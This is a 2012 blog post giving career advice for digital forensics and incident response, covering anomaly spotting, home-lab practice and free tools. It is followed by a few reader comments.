Friday, December 21, 2012

How Do I Get There From Here - Part 2

So, I have had more folks ask me about a career in Incident Response and Computer Forensics lately, so I thought I would expound a bit on my original post, How Do I Get There From Here.

I think it's worth mentioning again, that the thing that will propel you in your career, regardless of what that may be, is sheer desire.  Getting up everyday, and thinking that you are not going to work because you have to, but rather that you get to go work doing something you love, makes a huge difference.  I cannot stress that be a really good investigator, there is no other way.

Something else that I have recently discovered (thanks to some great Detectives) is a great skill to have is the ability to spot patterns and anomalies.  So much of what we do in solving cases begins with finding something that just doesn't look right.  You don't have to know exactly what it is, but you know something is just off will lead you down the path of taking a deep dive into that, "thing" which will either prove or disprove your hypothesis.  Then, Sniper Forensics baby, you either use that finding to guide your investigation further, or you step back, formulate a new hypotheses, and drive on.  But that initial "hrm...what are you" moment, is something you should experience throughout your investigations.

I spoke about this at a conference once, and I was asked, "How do I learn how to spot anomalies "  Which is a valid which I answered, "By knowing what "normal" looks like".  You need to put in the chair time.  You need to know what processes should be running, from where, what is common, why - basically what makes a normal system look normal.  I was a sysadmin for many years before I ever moved into security, which helped me tremendously once I moved into the DFIR world.  If you don't have that background, then virtualization is a great thing.  Fire up some VMs of different operating systems and just look at it.  It sounds boring...but you know...wax on wax off...

Spotting patterns is a bit different.  It requires you to be able to look at data elements and find similarities in them that could be anomalous.  The best example I can think of is reviewing web logs for IOCs of SQL Injection or RFI.  If you have ever seen these attacks in logs before, you know what I am referring to.  You can actually see patterns of the attacker walking the database structure.  If he's using an automated tool to do this, you can spot it a mile away - if you scroll through the logs, it looks like a series of shark fins.  The same holds true for RFI can spot the pattern of the attacker trying to get the system to upload his file.  This is also the case for several different kids of attacks...they have visible patterns that after you put in some chair time, you can spot.  Again, even if you don't know exactly what you're looking at just that it's unique when compared to it surroundings.

OK Chris...that's all well and good in theory, but that does not help me find a DFIR job.  Do you have any recommendations that will help me actually get in the door?  Great question...and Yes...yes I do.

OK...Bit of history...when I was a sysadmin at American Express in Phoenix, I used to admin both Windows  and *nix servers (Solaris, AIX, and Linux).  It was pretty cool, but kind of boring as it didn't present anything in the way of challenges (at least for offence to Sysadmins...that's my roots!).  So, I started looking into this whole security thing (this was about 2001).  Pentest looked kewl to me.  I knew how to make stuff work...let's see if I can learn how to break into those same systems.  Since I didn't actually have a security job, I couldn't actually DO anything security related at work.  So, I bought a copy of VMware, and started playing with tools.  What was Metasploit and what did it do?  What is ARP spoofing...can I do that at home?  Basic research in my home lab.  So, when I finally found an opening and got an interview, I was able to tell the hiring manager that all I have is what I found in the open source community, and my home lab, but I practice and research at home.  I read books, blogs, and whitepapers trying to get as much knowledge as I could without actually doing the job.  Well, I got the job for that very reason.

All of that to that.  If you want a job in DFIR and you are not currently working in DFIR, then research in your home lab.  Take images of your systems, your ipod, your buddies laptops...whatever and start to play with the tools of the trade.  Learn how to mount images, create timelines, parse data on the command line, learn how to use grep, gawk, and cut, use RegRipper to inspect registry hives...etc.  Knowing which tool to use, when and why is critical!  Remember, I rarely ever use commercial forensics tools.  You can conduct comprehensive investigations without ever spending a dime!

So, if when somebody interviews you, and you tell them...I don't do this for a living but I want to and here is what I am doing to prepare myself for that, that should speak volumes about the type of employee you would be.  I know for me, you would certainly shoot to the top of my list.

I hope that helps clarify things a bit for those of you that are seeking careers in DFIR.  If there is something you would like me to expand on, please let me know!  Or, if there is something I mentioned that you would like me to dig deeper into, please let me know.  I am more than happy to help!  After all, I may be interviewing you someday.  It would be great to hear that you read my blog posts and so you did X.

Best of luck to you!


  1. Chris,

    Great post! A great way to go about spotting anomalies is to start by spotting patterns. Taking your "desire" comment a bit further, how many folks run a tool to parse data, as opposed to opening the data source in a hex editor? Corey Harrell's most recent post over on the JourneyintoIR blog ( is a great example of recognizing patterns and anomalies.

    This also brings to mind your comments from the "Sniper Forensics" presentations regarding "expert eyes". Your graphic if the deer track in the mud really brought it home for me, as my wife and I ride horses in a public park. Knowing what...or out there can be very beneficial. Knowing that deer moved through the area and are likely in our path can keep us alert and help us avoid accidents. The same is true for all manner of DFIR work...knowing what to look for, what can lead you to other things, and what's out of place can make an exam go much more smooth, and help the examiner avoid getting caught by surprise.

  2. Very good post and I would have to agree with everything you said. I think it is important to note that you CANNOT shortcut the game. InfoSec, whatever your domain is supposed to be somewhat of a capstone in Information Security. I don't think it is reasonable to expect to graduate and come out into an InfoSec job. Most of the stories, mine included meant putting in a lot of time and working your way up as an App Dev, Sys Admin, Network Admin. Then, someone taking a chance on you because they see the potential. Most importantly, not only in you not letting them down, but making their expectations seem whimsical once you've started rolling through.

    There is a certain amount of drive and curiosity. You basically have to not leave things to "wonderment" get in there and see how and why it does what it does.

  3. just linked this article on my Facebook account. it’s a very interesting article for all.

    Digital Graffiti UK